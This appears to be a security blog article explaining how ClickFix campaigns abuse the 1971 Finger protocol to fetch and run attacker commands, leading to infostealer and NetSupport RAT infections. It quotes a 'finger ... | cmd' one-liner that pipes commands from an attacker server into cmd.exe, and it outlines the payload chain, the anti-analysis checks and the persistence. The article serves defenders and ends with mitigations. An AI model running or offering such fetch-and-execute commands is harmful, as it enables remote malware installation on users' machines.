ClickFix is so widespread these days that you can find the most exotic things in it. In one campaign, researchers spotted an original malware delivery method: they’re using the Finger protocol. You know, the one written in 1971. That’s right—attackers are dusting off ancient tech to deliver modern threats, and it’s working.
When you run the finger command, it connects to TCP port 79 and retrieves information from a remote finger server. In its original form, it returns basic user details. But in the context of ClickFix? It retrieves malicious commands instead.
How ClickFix Abuses Finger
Here’s how this works. A user falls for a ClickFix page—maybe a fake CAPTCHA verification or a document viewer error. They’re told to press Win+R and run a command. The command looks something like this:
cmd /c start "" /min cmd /c "finger [email protected][.]org | cmd"What happens next is clever. The finger command connects to the attacker’s server and retrieves commands, which are then piped directly through cmd.exe and executed. No PowerShell needed. No suspicious downloads. Just a simple protocol from 1971 doing the attacker’s bidding.
- Created a random-named path
- Copied curl.exe to a random filename
- Used the renamed curl to download a zip archive disguised as a PDF
- Extracted a Python malware package
- Executed it using pythonw.exe
All while displaying a fake “Verify you are human” prompt to keep the victim thinking everything’s fine. The final payload? Likely an infostealer, based on related batch files researchers found.
Advanced Variants
But wait, it gets better. Some variants are more sophisticated. One campaign uses “`finger [email protected] | cmd`” to retrieve commands that first check for dozens of malware analysis tools. If it finds any of these, it exits immediately:
- Filemon, Regmon, Procexp, Procmon
- Tcpview, Vmmap, Portmon
- Wireshark, Fiddler
- IDA, x64dbg, OllyDbg, ImmunityDebugger
- ProcessHacker, ProcessLasso
- And more
If no analysis tools are detected, it proceeds to download a zip archive disguised as a PDF. But instead of a Python package, this one extracts NetSupport Manager RAT—a full remote access trojan. Then it configures a scheduled task to launch the malware when the user logs in. Persistent access, delivered via a protocol from 1971. You’ve got to respect the creativity, even if you hate the intent.
Why This Works: The LOLBIN Advantage
Finger is a legitimate Windows command. It’s a LOLBIN (Living Off The Land Binary)—a legitimate tool that attackers abuse for malicious purposes. Security tools don’t flag it because it’s supposed to be there. It’s not malware. It’s just a command doing what it was designed to do, except the attacker controls what information it retrieves.
This isn’t even the first time finger has been abused. Researchers warned about this back in 2020. But now it’s part of the ClickFix toolkit, and it’s working because users are falling for the social engineering.
A Real Victim’s Story
One Reddit user shared their experience after falling for this exact attack. They were in a rush, saw a “verify you are human” prompt, and ran the command. After realizing what happened, they panicked and asked for help. McAfee+ showed no threats, which made them even more worried.
This is the reality of ClickFix attacks. Users are in a hurry. They see something that looks legitimate. They follow instructions. And by the time they realize something’s wrong, the damage might already be done. The finger command executes, retrieves the malicious script, and the payload is delivered—all while the user thinks they’re just verifying they’re human.
This is what ClickFix has become. It’s not just one attack method—it’s an entire ecosystem of social engineering techniques. Attackers are getting creative, using everything from modern AI-powered pages to protocols from 1971. They’re adapting faster than defenses can keep up.
The fact that a 54-year-old protocol is being used in modern attacks tells you something about the state of cybersecurity. Attackers will use whatever works. If it’s old, obscure, and still functional, they’ll abuse it. And users will fall for it because they’re human, they’re in a hurry, and they trust what looks legitimate.
So protect your users. Block port 79. Monitor for finger.exe. Deploy layered defenses. And remember: if you couldn’t teach them not to stick their fingers in electrical outlets, you’re definitely not going to teach them not to run commands from suspicious websites. The best you can do is catch the attacks when they happen.
ClickFix is so widespread that attackers are using the most exotic delivery methods. The Finger protocol from 1971 is just the latest example. It’s a simple, legitimate command that retrieves information—except now attackers control what information it retrieves, and that information is malicious commands.
Users will fall for these attacks. They’re human. They’re in a hurry. They see something that looks legitimate and they follow instructions. The best defense isn’t trying to teach them not to make mistakes—it’s building security controls that assume they will and catching attacks before they succeed.
For more on ClickFix attacks, check our analysis of ClickFix evolution in 2025 and how attackers are using Lumma Stealer in these campaigns.
